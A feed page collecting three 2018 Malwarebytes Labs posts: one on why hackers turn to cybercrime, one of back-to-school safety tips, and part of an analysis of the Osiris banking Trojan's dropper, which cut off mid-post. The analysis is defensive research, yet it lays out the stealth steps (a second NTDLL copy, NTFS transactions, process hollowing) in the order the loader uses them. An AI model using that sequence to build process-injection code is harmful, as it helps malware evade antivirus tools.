Techie Feeds

Under the hoodie: why money, power, and ego drive hackers to cybercrime

Malwarebytes - Wed, 08/15/2018 - 14:00

Just one more hour behind the hot grill flipping burgers, and Derek* could call it a day. Under his musty hat, his hair was matted down with sweat, and his work uniform was spattered with grease. He knew he’d smell the processed meat and smoke for the next three days, even after he’d showered. But it was money, he supposed.

“Derek!” His manager slapped him on the shoulder. “A little bird told me you were good with computers. I’ve got a job for you, if you’ll take it.”

The next day, with routers and cables bought and paid for by his manager, Derek networked his boss’ entire home. After one hour of work, he was handed a crisp $100 bill. Derek made a quick calculation: He’d have to put in three full shifts at the burger joint to take home the equivalent.

Unfortunately, not all of Derek’s clients had his manager’s money. Like him, his classmates came from a modest middle-class background, and they often couldn’t afford the latest video games, DVDs, and albums. But Derek had something not even his boss had: the ability to hack.

Mostly, his classmates looked for video game hacks, like unlimited life, or access to boatloads of free music. Sometimes they needed expensive cables to set up LAN parties, and Derek could McGyver a cat-5 so that his friends only had to pay him $10, instead of the $50 they cost at Best Buy.

Sometimes, Derek took on work that was a little more dangerous or challenging—like scamming other scammers to get onto their networks and drop malware or redirecting browser traffic to personal eBay storefronts—and he proved himself adept at this type of problem solving. Everyone knew Derek was the man to go to for these things—and he liked that. What’s not to like? Money, popularity, and a quiet “screw you” to the man. He was proud of his ability to hack into and modify programs built by professionals.

“There was ego involved, of course. It was like, ‘Ha! Look what I did that I wasn’t supposed to be able to do,’” said Derek, who today works as an engineer at a security company, but sometimes still participates in less-than-legal activities online. “Some 13-year-old kid just beat a 30-year-old programmer.”

Derek’s hacking hobby soon became more than a pastime. The stars had aligned for him to step into the world of cybercrime.

What makes a cybercriminal?

Some of Derek’s actions might sound familiar to those who tapped into the early, Wild West-esque days of the Internet. Pirating and counterfeiting music, video games, and DVDs was par for the course in the mid and late 1990’s, until the Napster lawsuit and subsequent shutdown opened the nation’s collective eyes to the fact that these actions were, in fact, unlawful.

Today, we know better. Those who can game the system are called hackers, and the term is often used interchangeably with cybercriminals. However, hackers are merely people who know how to use computers to gain access to systems or data. Many hackers do so with altruistic purpose, and they are called white hats.

White hats are considered the good guys. They’re experts in compromising computer systems, and they use their skills to help protect users and networks from a criminal breach. White hats often work as security researchers, network admins, or malware analysts, creating systems to capture and analyze malware, testing programs for vulnerabilities, and identifying weaknesses in companies’ infrastructures that could be exploited and/or infected. Their work is legal, sanctioned, and compensated (sometimes handsomely). But sometimes, even white hats can find themselves in compromising positions.

Good guys (and girl): The Malwarebytes intel team

Jared* got his start in IT as a technician, working at a mom-and-pop shop that he had frequented often when putting together his own machine. “I was a computer hobbyist,” he said. “I bought and built my first one, and I kept going to the same store for parts. Eventually, I ended up working there.”

Jared built up his skills working in the shop, eventually moving up to enterprise work at a larger chain store. It was there that he was introduced to a software developer that was making an anti-malware product designed to rip spyware out of people’s machines. He was hired on to add definitions (the code that helps antivirus programs detect malicious software).

But soon, Jared started to sense that something was off. Despite the fact that the company owners kept departments siloed—the user interface (UI) people didn’t know what the product development people were doing, and none of them knew what the marketing people were up to—Jared started asking uncomfortable, ethical questions in meetings that made him rather unpopular.

“I had the horse blinders on. I knew that there was stuff taking place that I was not comfortable with, and I chose to ignore it because it wasn’t the product I was working on,” he said. “But, that mental gymnastics got harder and harder and harder, until I finally realized that some aspects of the company I was working for were super scummy.”

What Jared came to realize after moving into a Q/A position was that he was, in fact, working for a potentially unwanted program (PUP) maker—a product created mostly to rip people off. He might not have been trying to participate in cybercrime, but he was complicit.

Despite trying to fight the corruption from the inside, Jared was stuck. He needed this job to stay financially afloat. Finally, after six years at the company, he was actively looking for a new job in IT when he was approached by a legitimate security company—and that’s where he is today. His bosses at the PUP maker, however, knew exactly what they were doing. And that’s why they’re considered black hats.

Black hats are the bad guys; the cybercriminals. They use a similar skill set as white hats, but their intentions are not to protect systems. Instead, they look to cause damage to their targets, whether that’s stealing personal data for monetary gain or coordinating attacks on businesses for revenge. Black hats’ criminal activity ranges from targeting individuals for state-sponsored espionage to widespread corporate breaches, and their efforts may be conducted from outside an organization or embedded within as an insider threat.

But the world is not black and white. A third set of hackers exists between opposite ends of the moral spectrum, and they are known as gray hats. They may not be trying to cause intentional harm, but they’re often operating outside the law. Gray hats might identify as cybervandals or rogue researchers, publicly announcing vulnerabilities to bring attention to a problem. For example, a gray hat could compromise a system without an organization’s permission, but then inform the organization after the fact in order to help them fix the problem. You might consider Jared a gray hat during his tenure at the PUP maker, even though he entered and left the establishment with the best of intentions.

What sets a cybercriminal apart from a security researcher, then, comes down to motive. Ethical hackers look to improve the security of software programs to protect users and their online experiences, whereas cybercriminals seek to undermine the integrity of those systems and programs for their own gain. It’s why people hack that shapes the nature of their being.

Putting together the profile

Without knowing the identity of cybercriminals (as most do a good job of covering their tracks), criminal profiling becomes a useful tool to begin drawing more accurate pictures of the people behind the proverbial hoodies.

Criminal profiling is a psychological assessment that includes personality and physical characteristics. “Fitting the profile” doesn’t necessarily mean a person committed the crime, but it can help narrow the field of suspects and exclude others from suspicion. Profilers use both inductive profiling (statistical data involving known behavioral patterns and demographic traits) and deductive profiling (common sense testing of hypotheses related to forensics, crime scene evidence, and victimology) to create personas of criminals. They are then able to identify criminals based on an analysis of their behavior while they engage in the crime.

Online, however, gathering this type of data can be nearly impossible. How can criminal profilers identity the crime scene, for example, when a victim might not even know how, when, or where he was infected?

According to an article in CIO, criminal profiling has a success rate of 77 percent in assisting traditional investigations. Unfortunately, no such headway has been made for cybercrime. Instead, both corporate and individual would-be victims rely on a combination of cybersecurity awareness (aka street smarts for computers) and technologies to prevent the crime from happening in the first place. These technologies include firewalls, encryption, two-factor authentication, antivirus, and other more advanced forms of cybersecurity software.

And while technology has been the main defense against cyberattacks, experts say a better understanding of the psychological, criminological, and sociological side of the equation can help fortify protection and possibly catch thieves in the act.

“Those that get caught never invest in sensible growth funds or get their families out of the country. They buy sports cars,” said William Tsing, Head of Intel Operations at Malwarebytes, whose work includes coordinating with law enforcement to take down cybercriminals. “Florida has had success getting people with outstanding warrants by the classic giveaways of sports cars and boats. These men have very specific ideas of who they’re ‘supposed’ to be, and buying expensive toys plays to their ego. They steal what they think they deserve.”

That being said, only 5 percent of cybercriminals are actually apprehended.

To better understand their psychological, criminological, and sociological motives, former police officer and IT professional Deb Shinder put together a set of characteristics she says that most cybercriminals exhibit. These include:

  • Some measure of technical knowledge
  • Disregard for the law or rationalization about why particular laws are invalid or should not apply to them
  • High tolerance for risk or the need for a “thrill factor”
  • “Control freak” nature, enjoyment in manipulating or outsmarting others
  • A motive for committing the crime—monetary gain, strong emotions, political or religious beliefs, sexual impulses, or even just boredom or the desire for fun

A generic cybercriminal profile, therefore, might look like this: “Male, under 25, history of anxiety, angry, sustained difficulties with in-person interaction, and distrustful of anything outside of science or tech,” said Tsing, who qualifies that it applies to North American and Chinese black hats only—Russian black hats likely fit a different profile.

Additional research conducted by online payment company Jumio finds that three-quarters of cybercriminals are male, and they work in organized groups, half of which have six or more members. (Though this is not to be confused with organized crime, which cybercriminals have, surprisingly, little connection with.) And they live all over the world, but are found especially in Asia, most notably China, Russia, and Indonesia.

As there as so many different forms of cybercrime, so too are there different profiles. Those who participate in online piracy have different traits from those who are scam artists, as well as those who are involved in human trafficking or child pornography.

Types of cybercrime

The various types of cybercrime committed by black hat hackers are highly influenced by technical skill, though socio-economic factors also play a part. Those who are able to participate in cybercrime that requires higher technical expertise often come from fairly comfortable, middle-class backgrounds. Yes, there are savants—your Good Will Huntings who come from extreme poverty and are self-taught—but for the majority of cybercriminals, a base level competence in computer science is acquired at home, with private access to a computer, and at school.

“In high school, I took computer science classes. That was actually my first exposure to cybercrime and the dark world,” said Derek. As a freshman, he was in class with seniors who were already involved with less-than-legal activities, and they taught Derek how to grow his own abilities, whether that was by finding better content or achieving faster download speeds.

Personal preference and opportunity certainly play a role, but technical skill is the major factor that separates the scammers from the ransomware authors. We separate types of cybercrime (and criminals) into categories as follows:

Online piracy: We’ve covered this fairly well with Derek’s actions, but online piracy involves illegally copying and sharing copyrighted material, such as movies, video games, and music. In the US, this is an infringement on the Digital Millennium Copyright Act (DMCA), which was enacted in 1998. It doesn’t require much technical skill to do the copying and sharing of files, but it does require some basic know-how to find torrent sites that won’t infect your own machine and stay under the radar enough to avoid fines.

Malware/PUP writing: To write programs that deploy malicious code generally requires a much higher level of technical prowess, whether that’s authoring a program that can discover vulnerabilities in other software and escort malware through the door (exploits) or creating ransomware that can seize and encrypt a system’s files, holding them hostage.

Creators of potentially wanted programs also fit under this umbrella, as they require the requisite programming skills of any software maker, with the added bonus knowledge of dark design—e.g. sneaking pre-checked boxes into end-user license agreements (EULAs) or creating extra search bars that obfuscate their true purpose, which is to redirect users to sites out of their control.

One caveat: A lot of malware creation can now be conducted by those with lesser technical capabilities, such as script kiddies, or people that use existing computer scripts or code to hack into computers. Malware-as-a-service, then, has popped up as a profitable form of cybercrime, where black hats actually write and sell code to other black hats in place of or in addition to participating in their own attacks.

Scamming/fraud/extortion: Scamming requires little in the way of technical skill, but does rely on knowledge of classic social engineering techniques, such as exploiting fear, carelessness, or a variety of other emotions to manipulate users. Scamming in the cyberworld includes phishing attacks that seek credentials, such as usernames and passwords and technical support scams, which dupe users into pay fake technicians to “fix” an issue in their computer that either doesn’t exist or that the technician has actually caused himself.

Those that write malware often look down upon the scammers for their lack of technical skill, and sometimes infiltrate scammer networks and drop their own viruses or worms.

“I liked causing pain to people who were trying to screw over grandma,” said Derek. “In the land of the blind, the one-eyed man is king.”

However, socio-economics probably has the largest impact on this subset of criminals. Massive caller banks have been set up in states and nations where poverty runs rampant, including Florida and India, where scammers target the mentally ill or the elderly for low-end technical support scams and vendor fraud. While seemingly vile, it puts much-needed money in the pockets of the poor.

Cyberterrorism/state-sponsored espionage: Here live those with top-of-the-line hacking aptitude, such as the ability to reverse engineer malicious code or break military-grade encryption. Once cybercriminals become good enough at their trade, they’re often snatched up by nation-states that participate in this type of cyberwarfare. (Though there are those hacktivists that work independently from their governments.) In the US, those with a background in cybercrime are not invited to the cyber table, so to speak, but they are often courted and hired by private companies as security researchers

Child pornography/human trafficking: Sure, yes, technical skill is involved to some degree when you’re talking about this type of deviant behavior, but mostly you’re dealing with the soulless and sociopathic, here. When it comes to the deep end of this criminal pool, psychological motive is the factor that separates the truly sick from the opportunists.

 What motivates a cybercriminal?

Indeed, motive is the most fascinating and also most illuminating factor that ultimately determines the full psychological profile of a cybercriminal. And while cybercriminals often have more than one motive for doing what they do, these motives can tell us the all-important why behind the hacking, as well as which type of cybercrime they’ll likely participate in.

“I didn’t brute force FTP servers as a kid because I was poor,” said Tsing. “I did it because I was bored, powerless, depressed, and smart enough to try it.”

Some of the main motives for different types of cybercrime break down as follows:

For fun/the challenge: According to a 2017 report from the National Crime Agency, 61 percent of cybercriminals begin before the age of 16. The young age of the offenders can be attributed to their access to technology and the perception that it’s a victimless crime.

“There’s a little bit of a Robin Hood complex there. I’m not saying it’s right, but I would say that for the most part, what I did was victimless crime,” said Derek of his video game hacking enterprise. “If anything, it was cheap marketing because they played the game and gave out reviews and loved the hell out of it.”

Shinder believes that many cybercriminals hack not out of malicious intent or financial benefit, but simply because they can. “They may do it to prove their skills to their peers or to themselves, they may simply be curious, or they may see it as a game,” she said.

John Draper, aka Captain Crunch (left), is one of the early pioneers of hacking.

One subject interviewed by the NCA said that illicit hacking made them popular, and they looked up to users with the best reputations. The NCA study also found that curiosity and a desire to increase skills were the most common factors that led to cybercrime. This assessment is corroborated by a recent report by Nuix, which found that 86 percent of surveyed threat actors said that they liked the challenge of hacking and hacked to learn. Additionally, 35 percent said they did it for the entertainment value or to make mischief.

If having fun or looking for a challenge is the main motive, then the buck likely stops for these budding cybercriminals at sharing copyrighted music and movies, defacing websites, or other low-impact crimes. If you combine this motive with others, however, the severity of the crime begins to increase.

Financial: Money can account for the motive behind almost all forms of cybercrime, from online piracy on down to scams and human trafficking. According to the Nuix report, 21 percent of surveyed respondents hacked for financial gain.

What pushes cybercriminals to continue down their path often amounts to putting more expendable cash in their pockets. As cybercriminals age, their financial needs change. What started as a yearning for new video games grows into wanting more cash to buy a car, date girls, and buy drinks at the bar. And often, criminals discover that their side hacking jobs pay way more than entry-level jobs in fast food or retail.

“The first time I started thinking about [hacking] for money was when I first started caring about money,” said Derek. “At 15, I started wondering how I was going to buy a car. [I was] making more than I should have been at 16-years-old—probably a couple grand a year. It was a lot more than my real job at the mall. At that point, I wasn’t thinking of stopping. Money talked.”

Cybercrime paychecks often stack up much higher against career IT jobs. For example, Jared made $45,000 a year while working for the PUP maker, which was much more than a basic computer technician could expect to make in his location and during the time he worked there. For those that are at the top of their crime field, the earnings are even higher. According to an April 2018 study by Dr. Mark McGuire, the highest-earning cybercriminals can make more than $166,000 per month, middle earners can make more than $75,000 a month, and the lowest-earning cybercriminals can still rake in more than $3,500 a month.

Still, money isn’t the only incentive for many threat actors, who prefer the anonymity and isolation of working in cybercrime over the human interaction required to work in a traditional office.

“The stated motive is always money. But that’s not necessarily true,” said Tsing. “It’s just that legit avenues to earn don’t appeal for various reasons. Often times, low level guys will make peanuts, but it’s peanuts where you don’t have to interact with others with respect, don’t have to be around women, and can take time off if you’re crippled with depression or anxiety. So, they go with $40–$60,000 selling DDoS or launching phishing attacks rather than take $75,000 in an office.”

Emotional: Shinder believes that the most destructive cybercriminals act out of emotion, whether that’s rage, revenge, “love,” or despair. This category includes ex-spouses, disgruntled or fired employees, dissatisfied customers, and feuding neighbors, to name a few. Cybercriminals motivated by emotion can often be found getting angry in forums, comments sections, and social networking groups, “trolling” users by baiting them with overly offensive, intentionally contrary content.

The emotional motive might be most personally destructive to the victims of lovers spurned. These criminals use their technical competence to cyber stalk their victims, access their accounts without authorization, or use Internet of Things (IoT) devices to commit domestic abuse, such as locking their loved ones inside the house via smart locks or cranking the heat up in the middle of the summer using Internet-controlled thermostats.

The malicious insider is another common subtype impacted by emotion. They are often upset about being overlooked for a promotion or raise, or are frustrated by a perceived injustice, which can send them on a critical path that includes defacement of company websites, DDoS attacks, stealing or destroying company data, or exposing confidential company information.

“As for the malicious insider, predispositions and professional dissatisfaction or a sense of being slighted in his job can serve as a trigger,” said certified forensic psychologist Dr. Harley Stock in an article for Dark Reading. “They move from a psychological sense of not being treated fairly to developing justification responses, giving themselves excuses to do bad behavior.”

Ego: For those involved in a variety of cybercrime, but especially social engineering attacks, shoring up a weak ego is a motivation that combines several psychological provocations, including insecurity, financial woes (and gains), and emotional turmoil into one powerful punch. In fact, if you ask Tsing, he believes ego is at the root of all cybercrime evil.

“I’d say the one overarching motive is emotional if I wanted to troll—they tend to go on at length about how they don’t have emotions. But it’s probably ego or power,” he said. “It gets confused as money, because they use money as a means to power. I think if it were actually money, though, we’d see a lot more of these folks leaving their countries of origin.”

Cybercriminals driven by a weak ego and lacking the technical skill to drop malware on their chosen targets tend to have more visibility into and interaction with their victims, and they validate those actions by convincing themselves they’re actually on the defensive, attacking “back” at those who put them in the position in the first place.

“They have such a shaky sense of self that they feel constantly under assault by essentially everyone,” said Tsing. “So, it’s not that they don’t care [about hurting others], it’s that they’re ‘getting back’ what’s theirs.”

Poor grandma. She must have been a real jerk to deserve having her identity stolen, or to field a phone call from a fake, desperate granddaughter who needed money to bail her out of jail (a real scam scenario).

Political/religious: According to the Nuix report, six percent of respondents said they hacked for social or political motives. Often associated with cyber activism/terrorism, hacktivism, and nation-state supported cybercrime, those with political or religious motivations hack with the intent to take down foreign adversaries. Shinder asserts that this particular motive is closely related to the emotional category, as people’s political and religious beliefs are often intertwined with their personal feelings. “People get very emotional about their political and religious beliefs, and are willing to commit heinous crimes in their name,” she said.

Sexual impulses/deviant behavior: Cyberpsychologist Mary Aiken, whose work was the inspiration for the TV show “CSI: Cyber,” famously joked in a 2015 Web Summit conference about the Freudian impulse that drives people to hack as “a cyber-sexual urge to penetrate.” While meant as a tongue-in-cheek poke at psychologists’ attempts to understand cybercriminals, there does exist a group in the darkest corners of the web to whom sexual compulsion and deviant behavior apply.

Although also related to emotion, those with sexual impulses are some of the most violent cybercriminals, as they commit heinous crimes using the Internet as a tool to lure in their victims. Rapists, sexual sadists, pedophiles, and even serial killers either use their own skill or hire those lacking a moral compass to help aid in their sexual predatory behaviors. Child pornographers and human traffickers also fit into this category, or they may be merely exploiting the sexual impulses of others for profit.

“I can tell you that there are people out there who just want to do harm and cause chaos. I saw some really messed up shit and decided I didn’t want to be part of it,” said Derek, who witnessed hitmen for hire, human trafficking, and bioengineering attack schemes while conducting research. “There are guys and girls out there who are ready to break people. They turn a human being’s psyche into a math problem and then subsequently solve the problem.”

Sometimes, a bad apple is just a bad apple.

What would make a cybercriminal reform?

Armed with the knowledge of what drives a cybercriminal to do what he does, we ask the question: How can we get black hats to turn into white hats? The answer shouldn’t surprise you: It’s likely the same things that made them hack in the first place. Of course, there are those that are psychopathic by nature—generally one in 100 people—and they just want to wreck the place. But others could be swayed by the following:

Money: Pay a cybercriminal well enough to work as a malware analyst, and they won’t be able to justify to the IRS where all this extra cash from cybercriminal side jobs is coming from. If you tip the balance of the risk/reward ratio, you can court many of those whose motivations are financial to the side of the light.

According to Payscale.com, the median salary of an ethical hacker is around $72,000 a year and consultants can expect to be paid $15,000 to $45,000 per assignment. However, as discovered by the recent Osterman report, medium-sized companies aren’t offering their security teams enough money right now. Salaries and retention numbers lag because their starting salaries average only $3,000 more than small companies, but $17,000 less than enterprises. In fact, the Osterman survey found that nearly 60 percent of security pros think that black hats make more money than security professionals.

How can companies fix the imbalance? Malwarebytes’ CEO Marcin Kleczynski said, “We need to up-level the need for proper security financing to the executive and board level discussions. This also means properly recognizing and rewarding the best and brightest security pros.”

Challenge: While money is a major factor for attracting cybercriminals to white hat positions, providing them with interesting and challenging work, and surrounding them with other talented researchers can keep them there.

“What really made me turn the corner was when a select group of people in the company who were known as the smartest took notice of me and the abilities I had shown, and invited me to mess around with a target,” said Derek, whose white hat work includes actively searching out criminal activity to stymie. “Being in the white hat community, I was exposed to many more skilled people. It was really good for me because it pushed me to learn so much more.”

Adrian Lamo, Kevin Mitnick, and Kevin Lee Poulsen: three former black hatters who reformed. Photographer: Matthew Griffiths

Age: Many simply grow out of this behavior. There’s a reason why security is on average older than any other IT field: It’s mostly composed of those who’ve seen the error of their ways or are looking for more stability.

“The ones that seem to think that cybercrime is victimless tend to be very young—generally, under 25, which is when the good judgement part of the brain finishes forming,” said Tsing. “You don’t see the consequences in front of you, therefore there aren’t any. Eventually, a huge amount of these guys age out of the profile and start acting like humans.”

In addition, the longer they go, the more skilled they become. The more skilled they become, the deeper waters in which they wade. Eventually, those whose consciences are alive and well will find themselves in uncomfortable positions. They’ve seen too much.

“In the wrong hands, these skills can be used to do some seriously scary shit,” said Derek. “I met a guy who had hypothesized targeting a primate gene that would effectively reset the world clock. One guy, through this tech, had the capability of watching the world burn, if he so chose…I like to think that at my core, I make the right decisions. I’m comfortable with me having the knowledge, but I know there are people out there who have a very different moral compass.”

Flipping the system: A paradigm shift in education might be one of the most difficult changes to achieve, but it also could help thwart teens with technical capability from participating on the fringes of society in the first place. Give your outside-the-box thinkers the platform to use their skills in a positive way, and they won’t be so tempted to go after the low-hanging, unscrupulous fruit.

Educational reform has been hard pressed to include 21st century learning initiatives, at least in the US, where many public schools in the K–12 system use barely-functioning tech—a single, shared iPad on a decrepit, crumbling network—and avoid topics such as digital citizenship and literacy in favor of standardized testing. For the kids already hacking video games, their classroom experience is, in Tsing’s words, “stifling and borderline traumatic.”

“At 19, I was going to community college and thought it was a joke. College was to show that you could complete a project start to finish and to build a network of people,” said Derek. “I had already learned to do that in high school with my enterprising.”

In addition, if the US government could get over their aversion to hiring former cybercriminals, there’d be a place for many more skilled individuals to do some good, especially as cybersecurity continues to be a concern surrounding our elections and infrastructure.

*******************************************************************************************

There’s a razor thin line separating the white hats from the black. Cybercriminals are equally passionate and skilled at what they do, but the lens through which the view the world may be blurred by socio-economic circumstances or psychological hang-ups. There are those that may be beyond hope, but there are also those who are simply too young or too insecure to work a system that feels like it’s set up to watch them fail.

Give them an off-ramp from the treadmill and hand them the tools sooner for doing some good online. Then we just might be able to hold out hope that we can, in fact, make the Internet a safer place to be, without having to clutch our passwords tight.

*Names have been changed to protect the anonymity of the cybercriminals interviewed for this piece.

The post Under the hoodie: why money, power, and ego drive hackers to cybercrime appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Back to school cybersecurity: hints, tips, and links for a safer school year

Malwarebytes - Tue, 08/14/2018 - 15:00

It’s that time of year again when parents are slowly gearing up for a new school term. Some schools have a strict policy of only using their own pre-approved lab devices, while others allow students to bring their own devices. Whatever the plan, it’s never too early to start thinking about some of the potential dangers.

Following the herd

When new schoolmates collide, there’s always a mad dash to join the collective and sign up to a bunch of popular websites. I’m sure many parents are intimately familiar with the “I want to set up a YouTube channel because my friend has one” request, followed closely by your own concerns about connected accounts, public-facing settings, and whether or not little Jimmy has uploaded 30 minutes of dabbing in front of the underwear dryer.

Spend some time going over privacy basics, like avoiding recording anything too identifiable. Don’t leave letters lying around in shots with home addresses on them or upload footage of yourself standing outside your house across the street from well-known public locations.

Time out

Digital devices are great, but there’s no harm in admitting they can be a problematic time sink at the worst possible moments. It isn’t just schools in Australia, but schools in the UK, too, who’ve started sending out letters about the incredibly popular game Fortnite. Those letters contain everything from advice on limiting digital playtime via game console parental controls to password security basics due to scammers being quite happy to pilfer accounts, if given the chance. Almost every digital device I can think of can have some form of time restriction applied to it if need be, and parents should definitely read up on the subject.

A little vanity searching never hurt anyone

It’s not just enough that your kids avoid posting personally identifiable information online, either on their own accounts or school issued pages; they should also occasionally see what others might be saying, too. If a bully is able to work out your address at school and decides to post it online, you’d never know about it. Smart searching can save the day, and help to get the offending information taken down. This may be something you choose to do yourself rather than burden the child with additional responsibilities.

Security can be fun

You don’t need to wait until school time to give your kids some security tips. In fact, it might be more advantageous for them to head into their new term with some decent computing knowledge, and it’ll certainly impress teachers at the same time. We’ve written a lot about engaging children with infosec, and our post on this very subject will be useful whether you’re a parent, educator, or both.

Kids and the written word

There’s a lot of advice guides out there for parents, and though the books may not be specific to schooling, many of the tips within remain valid. Consider choosing a few titles on the subject of digital literacy, citizenship, or cybersecurity, and brush up your own knowledge on the latest issues affecting kids in cyberspace. Online popularity, social media, and (especially) anything to do with gaming should be your first port of call where learning is concerned…they’re all magnets for children and any associated problem points.

Networks and nopeworks

If the school devices are of the fixed, pre-approved types that never leave the classroom, tell your children not to save anything particularly personal to them, outside of whatever schoolwork is required. You don’t want a batch of their selfies or bad emo poetry (we’ve all done it) being stored on some obscure portion of the school network. Even if devices can be brought home, there’s a good chance they may have some sort of monitoring and/or logging functionality onboard, so it pays to be cautious and avoid potential trouble further down the line.

The same goes for student-initiated installs on the device. Whether the school has a liberal install policy or the devices are totally on lockdown, it’s probably a good idea to always ask whoever is responsible for IT before installing something. The school may have its own internal portal where safe, approved apps live. Randomly grabbing downloads from Google Play, or turning off the “no installs from unknown sources” option could give everybody involved a massive headache.

Parental monitoring

It isn’t just the school that wants to keep an eye on your children’s computer use; this may be something you want to do as well. If that’s the case, we’ve written about how you can approach the potentially tricky subject of monitoring with your kids. Remind them: with great power (unfettered access to the Internet) comes great responsibility.

School social networks

Many schools have their own social portals for their students, and they act in a similar way to more well-known services. If your child is on one of these portals, make sure they’re using a strong, unique password, and understand the security/privacy settings of the network. As above, they should avoid posting anything too identifiable, and should refrain from cyberbullying their classmates.

Laptop lockdown

On a similar note, some schools will issue devices to students and leave much of the security in the hands of the laptop recipient. If that’s the case, we’ve got you covered with some schooltime 101 security lockdown tips.

Acceptable use policies

A school network without one of these would be a rare thing, so you may wish to request a copy of the AUP and see exactly what can, or can’t, be done while using the net on school time. If your child has a habit of, er, breaking the rules, then it might be an idea to talk over any of the most important points. Nobody wants to get kicked out of school for (what the child might think) is the silliest rule.

Ring the bell!

With our quickfire list of tips and links, both you and yours should be ready to roll when term time comes around. Going back to school can be a grind for older kids, and incredibly daunting for younger ones. Throw some technology into the mix and anything can happen, so it’s good to know a wealth of online resources exist for those willing to get their feet wet.

Speaking of, if you’d like even more advice on how to tackle tech and security concerns with your kids, take a look at Malwarebytes’ Director of Malware Intelligence Adam Kujawa’s live stream on the topic. Hint: Fast forward to about the six minute mark for the video to begin.

Unfortunately, we can’t tell you which sofa the school uniform is stuffed down, but we’re right here for all your computing-related needs. Wishing you all a productive and safe return to school!

The post Back to school cybersecurity: hints, tips, and links for a safer school year appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Process Doppelgänging meets Process Hollowing in Osiris dropper

Malwarebytes - Mon, 08/13/2018 - 18:29

One of the Holly Grails for malware authors is a perfect way to impersonate a legitimate process. That would allow them to run their malicious module under the cover, being unnoticed by antivirus products. Over the years, various techniques have emerged in helping them to get closer to this goal. This topic is also interesting for researchers and reverse engineers, as it shows creative ways of using Windows APIs.

Process Doppelgänging, a new technique of impersonating a process, was published last year at the Black Hat conference. After some time, a ransomware named SynAck was found adopting that technique for malicious purposes. Even though Process Doppelgänging still remains rare in the wild, we recently discovered some of its traits in the dropper for the Osiris banking Trojan (a new version of the infamous Kronos). After closer examination, we found out that the original technique was further customized.

Indeed, the malware authors have merged elements from both Process Doppelgänging and Process Hollowing, picking the best parts of both techniques to create a more powerful combo. In this post, we take a closer look at how Osiris is deployed on victim machines, thanks to this interesting loader.

Overview

Osiris is loaded in three steps as pictured in the diagram below:

The first stage loader is the one that was inspired by the Process Doppelgänging technique but with an unexpected twist. Finally, Osiris proper is delivered thanks to a second stage loader.

Loading additional NTDLL

When ran, the initial dropper creates a new suspended process, wermgr.exe.

Looking into the modules loaded within the injector’s process space, we can see this additional copy of NTDLL:

This is a well-known technique that some malware authors use in order to evade monitoring applications and hide the API calls that they use. When we closely examine what functions are called from that additional NTDLL, we find more interesting details. It calls several APIs related to NTFS transactions. It was easy to guess that the technique of Process Doppelgänging, which relies on this mechanism, was applied here.

NTDLL is a special, low-level DLL. Basically, it is just a wrapper around syscalls. It does not have any dependencies from other DLLs in the system. Thanks to this, it can be loaded conveniently, without the need to fill its import table.

Other system DLLs, such as Kernel32, rely heavily on functions exported from NTDLL. This is why many user-land monitoring tools hook and intercept the functions exported by NTDLL: to watch what functions are being called and check if the process does not display any suspicious activity.

Of course malware authors know about this, so sometimes, in order to fool this mechanism, they load their own, fresh and unhooked copy of NTDLL from disk. There are several ways to implement this. Let’s have a look how the authors of the Osiris dropper did it.

Looking at the memory mapping, we see that the additional NTDLL is loaded as an image, just like other DLLs. This type of mapping is typical for DLLs loaded by LoadLibrary function or its low-level version from NTDLL, LdrLoadDll. But NTDLL is loaded by default in every executable, and loading the same DLL twice is impossible by the official API.

Usually, malware authors decide to map the second copy manually, but that gives a different mapping type and stands out from the normally-loaded DLLs. Here, the authors made a workaround: they loaded the file as a section, using the following functions:

  • ntdll.NtCreateFile – to open the ntdll.dll file
  • ntdll.NtCreateSection – to create a section out of this file
  • ntdll.ZwMapViewOfSection – to map this section into the process address space

This was a smart move because the DLL is mapped as an image, so it looks like it was loaded in a typical way.

This DLL was further used to make the payload injection more stealthy. Having their fresh copy of NTDLL, they were sure that the functions used from there are not hooked by security products.

Comparison with Process Doppelgänging and Process Hollowing

The way in which the loader injects the payload into a new process displays some significant similarities with Process Dopplegänging. However, if we analyze it very carefully, we can see also differences from the classic implementation proposed last year at Black Hat. The differing elements are closer to Process Hollowing.

Classic Process Doppelgänging:

Process Hollowing:

Osiris Loader:

Creating a new process

The Osiris loader starts by creating the process into which it is going to inject. The process is created by a function from Kernel32: CreateProcessInternalW:

The new process (wermgr.exe) is created in a suspended state from the original file. So far, it reminds us of Process Hollowing, a much older technique of process impersonation.

In the Process Dopplegänging algorithm, the step of creating the new process is taken much later and uses a different, undocumented API: NtCreateProcessEx:

This difference is significant, because in Process Doppelgänging, the new process is created not from the original file, but from a special buffer (section). This section was supposed to be created earlier, using an “invisible” file created within the NTFS transaction. In the Osiris loader, this part also occurs, but the order is turned upside down, making us question if we can call it the same algorithm.

After the process is created, the same image (wermgr.exe) is mapped into the context of the loader, just like it was previously done with NTDLL.

As it later turns out, the loader will patch the remote process. The local copy of the wermgr.exe will be used to gather information about where the patches should be applied.

Usage of NTFS transactions

Let’s start from having a brief look at what are the NTFS transactions. This mechanism is commonly used while operating on databases—in a similar way, they exist in the NTFS file system. The NTFS transactions encapsulate a series of operations into a single unit. When the file is created inside the transaction, nothing from outside can have access to it until the transaction is committed. Process Doppelgänging uses them in order to create invisible files where the payload is dropped.

In the analyzed case, the usage of NTFS transactions is exactly the same. We can spot only small differences in the APIs used. The loader creates a new transaction, within which a new file is created. The original implementation used CreateTransaction and CreateFileTransacted from Kernel32. Here, they were substituted by low-level equivalents.

First, a function ZwCreateTransaction from a NTDLL is called. Then, instead of CreateFileTransacted, the authors open the transacted file by RtlSetCurrentTransaction along with ZwCreateFile (the created file is %TEMP%\\Liebert.bmp). Then, the dropper writes a buffer into to the file. Analogically, RtlSetCurrentTransaction with ZwWriteFile is used.

We can see that the buffer that is being written contains the new PE file: the second stage payload. Typically for this technique, the file is visible only within the transaction and cannot be opened by other processes, such as AV scanners.

This transacted file is then used to create a section. The function that can do it is available only via low-level API: ZwCreateSection/NtCreateSection.

After the section is created, that file is no longer needed. The transaction gets rolled back (by ZwRollbackTransaction), and the changes to the file are never saved on the disk.

So, the part described above is identical to the analogical part of Process Doppelgänging. Authors of the dropper made it even more stealthy by using low-level equivalents of the functions, called from a custom copy of NTDLL.

From a section to a process

At this point, the Osiris dropper creates two completely unrelated elements:

  • A process (at this moment containing a mapped, legitimate executable wermgr.exe)
  • A section (created from the transacted file) and containing the malicious payload

